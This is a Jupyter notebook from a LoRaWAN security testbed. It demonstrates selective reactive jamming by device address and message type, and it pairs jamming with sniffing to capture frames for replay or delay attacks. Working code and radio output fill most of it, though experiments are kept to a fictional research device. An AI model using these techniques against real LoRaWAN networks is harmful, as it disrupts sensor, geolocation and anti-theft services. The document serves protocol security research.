In [1]:
%matplotlib notebook

import matplotlib
import matplotlib.pyplot as plt
from IPython import display

import time
import traceback
import random

# Imports to access remote devices
from chirpotle.context import tpy_from_context

# Dissector, to create LoRaWAN payloads
from chirpotle.dissect.base import (
    DeviceSession,
    MType)
from chirpotle.dissect.v102 import (
    LoRaWANMessage_V1_0_2)

# Reactive Jamming

In this notebook, we continue our jamming experiments with the goal to attack only specific devices or message types. In LoRaWAN, this can be easily implemented, since most of the relevant fields are not encrypted. That allows reading a frame symbol by symbol until enough data is gathered decide whether the frame should be jammed or not.

From an attacker's perspective, this technique facilitates hiding jamming activity, as the actions are very specific. From a security researchers perspective, using reactive jamming allows to limit attacks only to research devices, making experimentation easier without affecting operational networks. That is particularly important for LoRaWAN, since the great range prevents realistic experiments within a single, shielded lab.

Our goal is to test the effectiveness of such a **reactive jammer**:
- by offset of the data used for decision within the frame
- by data rate

## Background: Reactive Jamming

To see how the reactive jammer works in LoRaWAN, let's have a look at the frame structure:

```
0    1                   5     6                                                              Offset
+----+----+----+----+----+-----+ - - +----+----+----+ - - - - - - - - - +----+----+----+----+
|MHDR|      DevAddr      |FCtrl|FOpts|   FCnt  |Port|      Payload      |        MIC        | Content
+----+----+----+----+----+-----+ - - +----+----+----+ - - - - - - - - - +----+----+----+----+
                                *****                *******************                      Encryption
```

The information about the message type is stored in the `MHDR` field directly at the beginning of the frame. The device address follows directly after. That means, the relevant information for most use cases is stored within the first five bytes of each frame.

A LoRaWAN data frame has at least a length of 12 byte (no payload, meaning also no `Port`, and also no `FOpts`). An example of such a frame would be an ACK or the answer to an ADRAckReq. That leaves us with 12-5=7 byte of decision margin after the device address is transmitted.

At this point it is important to note that there is no 1:1 correlation between payload bytes and symbol boundaries because of the spreading-factor-dependent bit/symbol ratio and the forward error correction. However, we will see that the 7 byte margin is always enough to jam LoRaWAN data frames.

## Node Selection

For the experiments in this notebook, we have node `alice` which transmits frames to node `bob`.

A third node is the `jammer`. The jammer works most successful if it is close to the receiver (`bob` in this case), so that the SNR for a frame sent by the jammer is 6dB higher at `bob`, compared to `alice`'s valid frames.

For more information on node configuration and troubleshooting, see the `01-tx-test` notebook.

Later on, we will also add a node called `sniffer` that is close to node `alice`, which will try to receive the original frame, while it is jammed for the legitimate receiver. This again works due to the capture effect and the physical distance between nodes. While the reactive jamming experiments can be done in a single room, for jamming plus sniffing, a physical distance creating an attenuation of more than 6dB is required.

The whole topology looks like this:

```
   ,---------,                                     ,---------,
   | Sniffer |                                    /| Jammer  |
   `---------´                                   / `---------´
        ^ original frames                       /
   ,---------,                                 /   ,---------,
   | Alice   | -------- LoRaWAN messages -----*--> | Bob     |
   `---------´         attenuation >6 dB           `---------´
```

`alice` and `sniffer`, as well as `bob` and `jammer` can be connected to the same ChirpOTLE hosts. We use ChirpOTLE nodes for all of the devices, since that facilitates experimentation. Alice and bob can be replaced by a LoRaWAN end device and gateway, respectively.

In [2]:
tc, devices = tpy_from_context()

You are running TPyControl in version 0.0.0
Connected to 2 remote nodes

node    host               proxy                                 modules (name[:type])
------  -----------------  ------------------------------------  -----------------------
alice   loranode1.example  PYRO:tpynode@loranode1.example:42337  lopy4:LoRa feather:LoRa
bob     loranode2.example  PYRO:tpynode@loranode2.example:42337  hat:LoRa lopy4:LoRa


From the list above we see the available modules. On node `alice` there is a single node `lora`, on node `bob` we have the node `lora` (will be the legitimate receiver) and `jammer` which will be our attacker node.

In [3]:
# Transmitting node
alice  = tc.nodes['alice']['lopy4']

# Receiving node
bob    = tc.nodes['bob']['hat']

# Jammer (close to the receiver)
jammer = tc.nodes['bob']['lopy4']

# We will assign the sniffer node later, so that all other experiments can run without it.

## Channel Configuration

Here we configure the channel that we will use. The settings below match the EU868 region of LoRaWAN. Note that frequency, bandwidth and spreadingfactor will be overidden during the experiment.

The `invertiq` IQ settings are the same for all nodes. With the configuration below, the nodes expect incoming frames with the same polarity as they transmit it. For the jammer, this means it will transmit jamming frames in the same polarity. It is important for the jammer to use the same polarity as the jammed signal, as otherwise performance will degrade notably.

In [4]:
channel = {
    'frequency': 869525000,
    'bandwidth': 125,
    'spreadingfactor': 12,
    'syncword': 18,
    'codingrate': 5,
    'invertiqtx': True,
    'invertiqrx': False,
    'explicitheader': True,
}

alice.set_lora_channel(**channel)
bob.set_lora_channel(**channel)
jammer.set_lora_channel(**channel)

{'frequency': 869524963,
 'bandwidth': 125,
 'spreadingfactor': 12,
 'syncword': 18,
 'codingrate': 5,
 'invertiqtx': True,
 'invertiqrx': False,
 'explicitheader': True}

## Test Data

We now create three valid LoRaWAN frames which can be used for our experiments with reactive jamming.

We use the fictional `0xDEADBEEF` (little endian) device as _our_ device, which we want to/are allowed to jam. The second device with the `0xCOFEBABE` (little endian) device address should not be affected by our jammer.

The `chirpotle.dissect` module helps with creating the frame structures and device meta data:

In [5]:
# Create a device session with some random keys for "our" device
ourDeviceSession = DeviceSession(
    fCntUp = 42,
    fCntDown = 23,
    appSKey = list(range(16)),
    nwkSKey = list(range(16)),
    devAddr = [0xEF, 0xBE, 0xAD, 0xDE])

# Create another device session for another device, which we don't want to jam
otherDeviceSession = DeviceSession(
    fCntUp = 300,
    fCntDown = 5,
    appSKey = list(range(16)),
    nwkSKey = list(range(16)),
    devAddr = [0xBE, 0xBA, 0xFE, 0xC0])

# A confirmed data uplink from our device
confirmed_uplink = LoRaWANMessage_V1_0_2(session=ourDeviceSession)
# Set the message type first to access other attributes
confirmed_uplink.mhdr.mType = MType.CONF_DATA_UP
# It is important to set all fields that have an impact on the keystream before
# setting the payload, because when setting frmPayload, it will be directly encrypted
# using the current values. So devAddr and frame counter and port (which decides the
# key) go first:
confirmed_uplink.payload.fhdr.devAddr = ourDeviceSession.devAddr
confirmed_uplink.payload.port = 1
confirmed_uplink.payload.fhdr.fCnt = ourDeviceSession.fCntUp
# Set one byte payload. Could be a sensor value or an alarm flag:
confirmed_uplink.payload.frmPayload = [0x42]
confirmed_uplink.payload.updateMIC()

# In a similar way, we create an unconfirmed frame from our device
unconfirmed_uplink = LoRaWANMessage_V1_0_2(session=ourDeviceSession)
unconfirmed_uplink.mhdr.mType = MType.UNCONF_DATA_UP
unconfirmed_uplink.payload.fhdr.devAddr = ourDeviceSession.devAddr
unconfirmed_uplink.payload.port = 1
unconfirmed_uplink.payload.fhdr.fCnt = ourDeviceSession.fCntUp
unconfirmed_uplink.payload.frmPayload = [0x12]
unconfirmed_uplink.payload.updateMIC()

# And another unconfirmed frame for the other device
other_uplink = LoRaWANMessage_V1_0_2(session=otherDeviceSession)
other_uplink.mhdr.mType = MType.UNCONF_DATA_UP
other_uplink.payload.fhdr.devAddr = otherDeviceSession.devAddr
other_uplink.payload.port = 1
other_uplink.payload.fhdr.fCnt = otherDeviceSession.fCntUp
other_uplink.payload.frmPayload = [0x12]
other_uplink.payload.updateMIC()

# Small helper functio to print raw frame and dissector output:
def printframe(frame, title):
    print(title)
    print("Raw:", " ".join("%02x" % b for b in frame[:]))
    print("Length:", len(frame), "bytes")
    print(frame.print(2))
    print()

Now, we will use the integrated dissector to show information about the frame. This is not required, but will help understanding where to find the values for the jamming decision later on.

First, we have an uplink frame of the `CONF_DATA_UP` type, meaning it requires an `ACK` by the network server. Note how the DevAddr is encoded in little endian byte order from bytes 2 to 5 in the raw output: `de ad be ef`:

In [6]:
printframe(confirmed_uplink, "Frame 1: Confirmed Uplink by our Device")

Frame 1: Confirmed Uplink by our Device
Raw: 80 de ad be ef 00 2a 00 01 40 ab b6 d7 6a
Length: 14 bytes
  LoRaWAN Message:
    MHDR:
      Message Type: CONF_DATA_UP
      LoRaWAN Major Version: 1.x
    Payload:
      FHDR:
        DevAddr: ef be ad de
        FCnt: 42
        FCtrl: 00000000
               0....... ADR: No ADR
               .0...... ADRACKREQ: No ADR ACK request
               ..0..... ACK: No ACK
               ...0.... Class: No Class B
               ....0000 FOptsLen: 0
        FOpts: ... (0 byte(s))
      Port: 1
      Application Payload:
        42
      As text:
        B
      MIC: ab b6 d7 6a (verified)




The second frame is also from our device, but this time as `UNCONF_DATA_UP`, so that we can learn how to do jamming based on the message type.

Note how the first byte of the raw frame differs, with `0x80` for confirmed uplink messages and `0x40` for unconfirmed traffic.

In [7]:
printframe(unconfirmed_uplink, "Frame 2: Unconfirmed Uplink by our Device")

Frame 2: Unconfirmed Uplink by our Device
Raw: 40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
Length: 14 bytes
  LoRaWAN Message:
    MHDR:
      Message Type: UNCONF_DATA_UP
      LoRaWAN Major Version: 1.x
    Payload:
      FHDR:
        DevAddr: ef be ad de
        FCnt: 42
        FCtrl: 00000000
               0....... ADR: No ADR
               .0...... ADRACKREQ: No ADR ACK request
               ..0..... ACK: No ACK
               ...0.... Class: No Class B
               ....0000 FOptsLen: 0
        FOpts: ... (0 byte(s))
      Port: 1
      Application Payload:
        12
      MIC: 30 af 2d 0d (verified)




Lastly, we have a frame by the other device to show how its communication is completely unaffected even with the jammer being present and active. If you compare this raw frame to the second frame, it differs in bytes 2 to 5, which encode the device address. Other bytes might differ as well, but don't help in differentiating the devices.

In [8]:
printframe(other_uplink, "Frame 3: Unconfirmed Uplink by the other Device")

Frame 3: Unconfirmed Uplink by the other Device
Raw: 40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Length: 14 bytes
  LoRaWAN Message:
    MHDR:
      Message Type: UNCONF_DATA_UP
      LoRaWAN Major Version: 1.x
    Payload:
      FHDR:
        DevAddr: be ba fe c0
        FCnt: 300
        FCtrl: 00000000
               0....... ADR: No ADR
               .0...... ADRACKREQ: No ADR ACK request
               ..0..... ACK: No ACK
               ...0.... Class: No Class B
               ....0000 FOptsLen: 0
        FOpts: ... (0 byte(s))
      Port: 1
      Application Payload:
        12
      MIC: 6d ec 49 d0 (verified)




## Jamming by Device Address

First we will try jamming based on the device address. Therefore, Alice will send all three test frames to Bob. The jammer will match device address `0xDEADBEEF`, so only the one frame for the other device (`0xCOFEBABE`) is expected to be received by Bob.

First, we configure Bob to listen:

In [9]:
# setting the channel again is not required if you execute the code top to bottom,
# but might be helpful if you re-run single experiments.
bob.set_lora_channel(**channel)
bob.receive()

0

> **Note:** Each device has a small buffer for incoming messages, so they don't need to be fetched directly. However, if the buffer is full, further incoming messages will be dropped. The buffer is also emptied when running commands that change the operational mode of the device, like `standby()` or `transmit_frame()`. So make sure to execute the steps in this section directly after each other if you face unexpected results.

Next, we configure the jammer. With jamming decisions being time critical, they have to be made on the devices as quickly as possible. Therefore, we define a _payload pattern_ and a _payload mask_. The pattern defines how a payload must look like if it should be jammed. As we are only interested in a part of the frame, the device address in this case, the mask defines which bits of the payload are compared.

Therefore, we set the values as follows:

```
Payload: MHDR | DevAddr     | FCtrl | ...
Value:   80   | DE AD BE EF | 00    | ...
Pattern: 00   | DE AD BE EF
Mask:    00   | FF FF FF FF
```

The pattern and mask can be shorter than the actual frame length, but they have to be of the same size. For each bit that is set in the mask, the device will compare value and pattern, and if they match, the jammer will be activated.

Setting up the jammer is done this way:

In [10]:
jammer.set_lora_channel(**channel)

# Configure the payload length used for jamming.
# The jammer uses a normal LoRa frame, so this is the length *after* preamble and PHYHDR
jammer.set_jammer_payload_length(4)
# Set the preamble length to the default length
jammer.set_preamble_length(8)
# Do not add a CRC on MAC layer
jammer.set_txcrc(False)

# Specify jammer settings:
# network byte order, with leading 0x00 for MHDR
pattern = [0x00, 0xDE, 0xAD, 0xBE, 0xEF]
# only look at bytes 2..5
mask = [0x00, 0xFF, 0xFF, 0xFF, 0xFF]

# Actually enable the sniffer by passing pattern and mask to it.
jammer.enable_sniffer(action='internal', # Trigger jammer on the same device (see note below)
                      pattern=pattern,
                      mask=mask)

0

> **Note:** The jammer will **stay active** and jam every frame. If you run `enable_sniffer(action='internal')` without pattern and mask, that will DoS the currently selected channel also for other networks and devices, so be careful what you are doing. To turn it off, you explicitly need to call `jammer.standby()`.

> **Note:** The `action='internal'` parameter specifies that the trigger for jamming should be handled internally on the same node. We tried connecting multiple MCUs running our firmware, an MCU with multiple LoRa transceivers, and even remote triggering via UDP (using two ESP32-based LoPy4s), but none of these approaches reached an equally well performance (latency-wise) than just flipping the same LoRa transceiver into tx mode for jamming. Setting `action='internal'` is a remnant of these experiments, but other values (like `gpio` or `udp`) are not recommended. 

> **Note:** When dealing with uplink and downlink frames, you have to be careful with **polarity**. In LoRaWAN, uplink frames are sent with a different polarity than downlink frames. Also, jamming a frame is only effective, if the tx polarity of the jammer is matching the polarity of the message that should be jammed. In this sheet, we only consider uplink frames, therefore, we do not have to care about that.

Now, we let alice send the frames, each with a short pause in between. After the experiment, we collect the frames that arrived at bob.

In [11]:
alice.set_lora_channel(**channel)

# Frame 1: Confirmed Uplink for our device
# → We expect this to be jammed
alice.transmit_frame(confirmed_uplink.raw, blocking = True)
time.sleep(3)

# Frame 2: Unconfirmed Uplink for our device
# → We expect this to be jammed
alice.transmit_frame(unconfirmed_uplink.raw, blocking = True)
time.sleep(3)

# Frame 3: Unconfirmed Uplink for other device
# → We expect this frame to arrive
alice.transmit_frame(other_uplink.raw, blocking = True)
time.sleep(3)

# Deactivate jammer (be nice to other people)
jammer.standby()

# Collect received frames from bob:
bob_frames = []
frm = bob.fetch_frame()
while frm is not None:
    bob_frames.append(frm)
    frm = bob.fetch_frame()
bob.standby()
print("Frames in bob's buffer: %d" % len(bob_frames))

Frames in bob's buffer: 3


Since the jammer reads parts of the payload before triggering, it cannot prevent the legitimate frame from being detected at the receiver as well (in fact, the jammer is a plain LoRa transceiver, so it also needs to perform frame detection before even starting to demodulate any payload). For that reason, we expect bob to **receive three frames**. If you see more frames when running the experiment, chances are that you have LoRaWAN end devices near you. If you see less or none, try increasing the spreading factor in the channel definition in the setup section.

LoRa can use a CRC on the physical layer, but the ChirpOTLE companion application is configured to ignore PHY CRC failure, so that you get data and information about frame times, even if the payload is partly scrambled.

To see what has been received, we print payload and meta data for each frame:

In [12]:
for idx, bob_frame in enumerate(bob_frames):
    print(f"bob_frames[{idx:1}] = {' '.join('%02x' % d for d in bob_frame['payload'])}")
    print(f"   RSSI: {bob_frame['rssi']:3} dBm   SNR: {bob_frame['snr']:3} dB" )

bob_frames[0] = 80 de ad be ef 00 2a 00 0a 17 7c 24 30 78
   RSSI: -62 dBm   SNR: -22 dB
bob_frames[1] = 40 de ad be ef 00 2a 00 09 12 7c 21 35 7c
   RSSI: -63 dBm   SNR: -23 dB
bob_frames[2] = 40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
   RSSI: -81 dBm   SNR: -21 dB


To analyse the effect of the jammer, please use the output above to match the received frames to the true sample frames that were created before:

In [13]:
# Matching of frames is done by hand, so you can adapt if other frames have been received.
# If a certain frame has not been received, just ignore it by setting it to None

# Confirmed uplink for our device, should start with 80 de ad be ef
rx_addr_confirmed_uplink = bob_frames[0]['payload']

# Unconfirmed uplink for our device, should start with 40 de ad be ef
rx_addr_unconfirmed_uplink = bob_frames[1]['payload']

# Unconfirmed uplink for the other device, should start with 40 co fe ba be
rx_addr_other_uplink = bob_frames[2]['payload']

We define a function that compares two frames nibble by nibble and run it for alice's transmitted frames and bob's recived frames:

In [14]:
def compare_frames(tx_frame, rx_frame, mask=None):
    def compare_byte(t, r):
        return (" " if t&0xf0 == r&0xf0 else "*") + (" " if t&0xf == r&0xf else "*")
    print("Transmitted:", " ".join("%02x" % d for d in tx_frame))
    print("Received:   ", " ".join("%02x" % d for d in rx_frame))
    if mask is not None:
        print("Jammer Mask:", " ".join(compare_byte(0,m) for m in mask))
    print("Jammed:     ", " ".join(compare_byte(t,r) for t,r in zip(tx_frame, rx_frame)))
    
# Use the function to print the received frames:
if rx_addr_confirmed_uplink is not None:
    print("Frame 1: Confirmed uplink from our device:")
    compare_frames(confirmed_uplink.raw, rx_addr_confirmed_uplink, mask)
    print()
if rx_addr_unconfirmed_uplink is not None:
    print("Frame 2: Unconfirmed uplink from our device:")
    compare_frames(unconfirmed_uplink.raw, rx_addr_unconfirmed_uplink, mask)
    print()
if rx_addr_other_uplink is not None:
    print("Frame 3: Unconfirmed uplink from other device:")
    compare_frames(other_uplink.raw, rx_addr_other_uplink, mask)

Frame 1: Confirmed uplink from our device:
Transmitted: 80 de ad be ef 00 2a 00 01 40 ab b6 d7 6a
Received:    80 de ad be ef 00 2a 00 0a 17 7c 24 30 78
Jammer Mask:    ** ** ** **
Jammed:                               * ** ** ** ** **

Frame 2: Unconfirmed uplink from our device:
Transmitted: 40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
Received:    40 de ad be ef 00 2a 00 09 12 7c 21 35 7c
Jammer Mask:    ** ** ** **
Jammed:                               *  * ** ** ** **

Frame 3: Unconfirmed uplink from other device:
Transmitted: 40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Received:    40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Jammer Mask:    ** ** ** **
Jammed:                                               


From the output above, we learn that the reactive jammer needs some time between observing the matching pattern and starting the jamming. There are mainly two factors determining how long it will take before jamming starts:

- The spreading factor, bandwidth, and coding rate used by the transmitter, since they define how may raw bits make up a symbol, and how symbols map to payload bytes
- The rx/tx switch and tx ramp-up time of the transceiver

Interestingly, the delay seems to be comparable for all data rates if it is measured in payload length between end of pattern and start of interference.

Also note that the third frame is completely unaffected by the jammer, even though the jammer was active.

## Jamming by Message Type

While the device address is the most obvious target for jamming, some higher layer attacks may need additional fields to be selected. Examples could be the _ACK Spoofing Attack_, first proposed by [Yang](https://repository.tudelft.nl/islandora/object/uuid:87730790-6166-4424-9d82-8fe815733f1e), which needs jamming of confirmed traffic (meaning selection based on the MType field in MHDR) or attacks on adaptive data rate, like [our ADR Spoofing](https://dl.acm.org/doi/10.1145/3395351.3399423), which could benefit from checking the ADRAckReq flag in the FCtrl field.

Here, we implement jamming of confirmed messages. For that, we can use a similar setup as in the previous attack, and only slightly modify the mask and pattern. For this demonstration, we still include the device address to not affect other networks:

```
Payload: MHDR | DevAddr     | FCtrl | ...
Pattern: 80   | DE AD BE EF
Mask:    E0   | FF FF FF FF
```

In [15]:
pattern = [0x80, 0xDE, 0xAD, 0xBE, 0xEF]
mask = [0xE0, 0xFF, 0xFF, 0xFF, 0xFF]

We run the same experiment from above:

In [16]:
# Enable receiver
bob.set_lora_channel(**channel)
bob.receive()

0

In [17]:
# Configure and activate jammer
jammer.set_lora_channel(**channel)
jammer.set_jammer_payload_length(4)
jammer.set_preamble_length(8)
jammer.set_txcrc(False)
jammer.enable_sniffer(action='internal', pattern=pattern, mask=mask)

0

In [18]:
# Transmit frames and collect received frame data
alice.set_lora_channel(**channel)
alice.transmit_frame(confirmed_uplink.raw, blocking = True)
time.sleep(3)
alice.transmit_frame(unconfirmed_uplink.raw, blocking = True)
time.sleep(3)
alice.transmit_frame(other_uplink.raw, blocking = True)
time.sleep(3)
jammer.standby()

bob_frames = []
frm = bob.fetch_frame()
while frm is not None:
    bob_frames.append(frm)
    frm = bob.fetch_frame()
bob.standby()
print("Frames in bob's buffer: %d" % len(bob_frames))
for idx, bob_frame in enumerate(bob_frames):
    print(f"bob_frames[{idx:1}] = {' '.join('%02x' % d for d in bob_frame['payload'])}")
    print(f"   RSSI: {bob_frame['rssi']:3} dBm   SNR: {bob_frame['snr']:3} dB" )

Frames in bob's buffer: 3
bob_frames[0] = 80 de ad be ef 00 2a 00 09 2e 4f b4 33 7a
   RSSI: -63 dBm   SNR: -23 dB
bob_frames[1] = 40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
   RSSI: -80 dBm   SNR: -20 dB
bob_frames[2] = 40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
   RSSI: -80 dBm   SNR: -20 dB


Again, we need to match received frames and expected frames, then we display the result:

In [19]:
# Confirmed uplink for our device, should start with 80 de ad be ef
rx_mtype_confirmed_uplink = bob_frames[0]['payload']

# Unconfirmed uplink for our device, should start with 40 de ad be ef
rx_mtype_unconfirmed_uplink = bob_frames[1]['payload']

# Unconfirmed uplink for the other device, should start with 40 co fe ba be
rx_mtype_other_uplink = bob_frames[2]['payload']

if rx_mtype_confirmed_uplink is not None:
    print("Frame 1: Confirmed uplink from our device:")
    compare_frames(confirmed_uplink.raw, rx_mtype_confirmed_uplink, mask)
    print()
if rx_mtype_unconfirmed_uplink is not None:
    print("Frame 2: Unconfirmed uplink from our device:")
    compare_frames(unconfirmed_uplink.raw, rx_mtype_unconfirmed_uplink, mask)
    print()
if rx_mtype_other_uplink is not None:
    print("Frame 3: Unconfirmed uplink from other device:")
    compare_frames(other_uplink.raw, rx_mtype_other_uplink, mask)

Frame 1: Confirmed uplink from our device:
Transmitted: 80 de ad be ef 00 2a 00 01 40 ab b6 d7 6a
Received:    80 de ad be ef 00 2a 00 09 2e 4f b4 33 7a
Jammer Mask: *  ** ** ** **
Jammed:                               * ** **  * ** * 

Frame 2: Unconfirmed uplink from our device:
Transmitted: 40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
Received:    40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
Jammer Mask: *  ** ** ** **
Jammed:                                               

Frame 3: Unconfirmed uplink from other device:
Transmitted: 40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Received:    40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Jammer Mask: *  ** ** ** **
Jammed:                                               


Now, only the confirmed frame of our device is affected, showing that the additional check for the MType field is effective.

In a controlled environment, where you can assure that other devices are affected, you can also shorten the `mask` list to `[0xE0]` and the `pattern` to `[0x80]` to see the effect of the shorter pattern on the length of the payload that gets scrambled. It will look like this:

```
Frame 1: Confirmed uplink from our device:
Transmitted: 80 de ad be ef 00 2a 00 01 40 ab b6 d7 6a
Received:    80 de ed f0 a3 a2 28 00 39 6d fd 1d 50 bb
Jammer Mask: * 
Jammed:            *  ** ** **  *    ** ** ** ** ** **

Frame 2: Unconfirmed uplink from our device:
Transmitted: 40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
Received:    40 de ad be ef 00 2a 00 01 10 30 af 2d 0d
Jammer Mask: * 
Jammed:                                               

Frame 3: Unconfirmed uplink from other device:
Transmitted: 40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Received:    40 c0 fe ba be 00 2c 01 01 c2 6d ec 49 d0
Jammer Mask: * 
Jammed:                                               
```

Since the decision for jamming can be made much earlier, in this case even the device address is affected. That means even if the receiver tries partial demodulation, it cannot determine which device tried to transmit this frame.

## Jamming And Sniffing

In this section, we try to receive the original content of jammed frames, while still jamming them for the legitimate receiver. This lays the foundation for wormhole attacks, as mentioned in [section 5 of our paper](https://dl.acm.org/doi/10.1145/3395351.3399423). As the figures there already show, the attacker needs two nodes for this to work, one located as close as possible to the transmitter, and one close to the legitimate receiver. The node at the transmitter acts as sniffer, and the node at the receiver as jammer.

The success of this attack depends on the characteristics of the capture effect in LoRa: If the receiver has synchronized to a LoRa frame, it will succeed in demodulating it, if no interference of a non-orthogonal chirp arrives at the receiver with a higher signal level than -6 dB compared to the synchronized frame.

For our setup, we attach the sniffer board to node alice and require an attenuation of 6 dB to the node to which bob and the jammer are attached to. Usually, several office walls are sufficient for this, in urban outdoor environments, it might require up to some hundreds of meters.

```
   ,---------,                                     ,---------,
   | Sniffer |                                    /| Jammer  |
   `---------´                                   / `---------´
        ^ original frames                       /
   ,---------,                                 /   ,---------,
   | Alice   | -------- LoRaWAN messages -----*--> | Bob     |
   `---------´         attenuation >6 dB           `---------´
```

We select a node to become the sniffer (must not be any node selected at the top of this sheet):

In [20]:
sniffer  = tc.nodes['alice']['feather']

In this experiment, we are no longer interested in the selectiveness of the jammer, but in the success of the sniffer while it is still not received by the legitimate receiver, bob.

We run ten rounds of an experiment and see how often that conditions is fulfilled:

In [21]:
num_rounds = 10

# Reset all channel configuration
alice.set_lora_channel(**channel)
bob.set_lora_channel(**channel)
jammer.set_lora_channel(**channel)
sniffer.set_lora_channel(**channel)

# Configure jammer (again: DevAddr)
pattern = [0x00, 0xDE, 0xAD, 0xBE, 0xEF]
mask = [0x00, 0xFF, 0xFF, 0xFF, 0xFF]
jammer.set_lora_channel(**channel)
jammer.set_jammer_payload_length(4)
jammer.set_preamble_length(8)
jammer.set_txcrc(False)
jammer.enable_sniffer(action='internal', pattern=pattern, mask=mask)

# Statistics
sniffer_got_it = 0
bob_got_it = 0
sniffer_got_it_but_bob_didnt = 0

true_payload = list(confirmed_uplink.raw)
try:
    for i in range(num_rounds):
        n = i+1
        print(f"Round {n:2}")
        # Enable receiver (that also clears the buffer from earlier rounds)
        bob.receive()
        # Enable sniffer (it is just a plain receiver, like bob is. Location makes the difference)
        sniffer.receive()
        time.sleep(0.5)
        
        # Transmit a test frame
        alice.transmit_frame(true_payload, blocking = True)
        time.sleep(2)
        
        # Get received payloads from bob and the sniffer
        bob_payloads = []
        frm = bob.fetch_frame()
        while frm is not None:
            bob_payloads.append(list(frm['payload']))
            frm = bob.fetch_frame()
        bob.standby()
        sniffer_payloads = []
        frm = sniffer.fetch_frame()
        while frm is not None:
            sniffer_payloads.append(list(frm['payload']))
            frm = sniffer.fetch_frame()
        sniffer.standby()
        
        # Evaluate run
        sniffer_success = true_payload in sniffer_payloads
        bob_success = true_payload in bob_payloads
        print(f"  Bob: {bob_success}   Sniffer: {sniffer_success}")
        if sniffer_success:
            sniffer_got_it += 1
        if bob_success:
            bob_got_it += 1
        if sniffer_success and not bob_success:
            sniffer_got_it_but_bob_didnt += 1
            
finally:
    jammer.standby()
    bob.standby()

print()
print(f"Done. Did {n} runs.")
print(f"Bob received a valid frame {bob_got_it} time(s).")
print(f"The sniffer received a valid frame {sniffer_got_it} time(s).")
print(f"The sniffer received a valid frame {sniffer_got_it_but_bob_didnt} time(s) while Bob didn't.")

Round  1
  Bob: False   Sniffer: True
Round  2
  Bob: False   Sniffer: True
Round  3
  Bob: False   Sniffer: True
Round  4
  Bob: False   Sniffer: True
Round  5
  Bob: False   Sniffer: True
Round  6
  Bob: False   Sniffer: True
Round  7
  Bob: False   Sniffer: True
Round  8
  Bob: False   Sniffer: True
Round  9
  Bob: False   Sniffer: True
Round 10
  Bob: False   Sniffer: True

Done. Did 10 runs.
Bob received a valid frame 0 time(s).
The sniffer received a valid frame 10 time(s).
The sniffer received a valid frame 10 time(s) while Bob didn't.


We can see that the sniffer was often successful to receive the frame while bob was not.

If alice was not a ChirpOTLE node, but a real LoRaWAN end device, and bob a LoRaWAN gateway, an attacker could now run a delay attack for this end device. The sniffed payload contains a valid LoRaWAN frame with a correct MIC. Due to the jammer, the Network Server has not processed the frame yet, meaning a frame with that frame counter value is still valid.

This alone is a problem for some types of sensor devices. If such devices do not contain their own clock or the payload does not contain a timestamp to reduce the frame length, the time of sensor readings often is assumed to be close to the transmission time. If an attacker can sniff frames, they can start replaying these frames later, and thus adding wrong temporal information to the sensor readings. The effect depends on the type of sensor.

But an attacker is not limited to modifying temporal information, but can also modify spatial information. If LoRaWAN geolocation is used, frames can be replayed at totally different locations to simulate movement of the devices. If the devices are part of an anti-theft-protection, the attacker can remove the protected goods but still replay the position signal from their former location.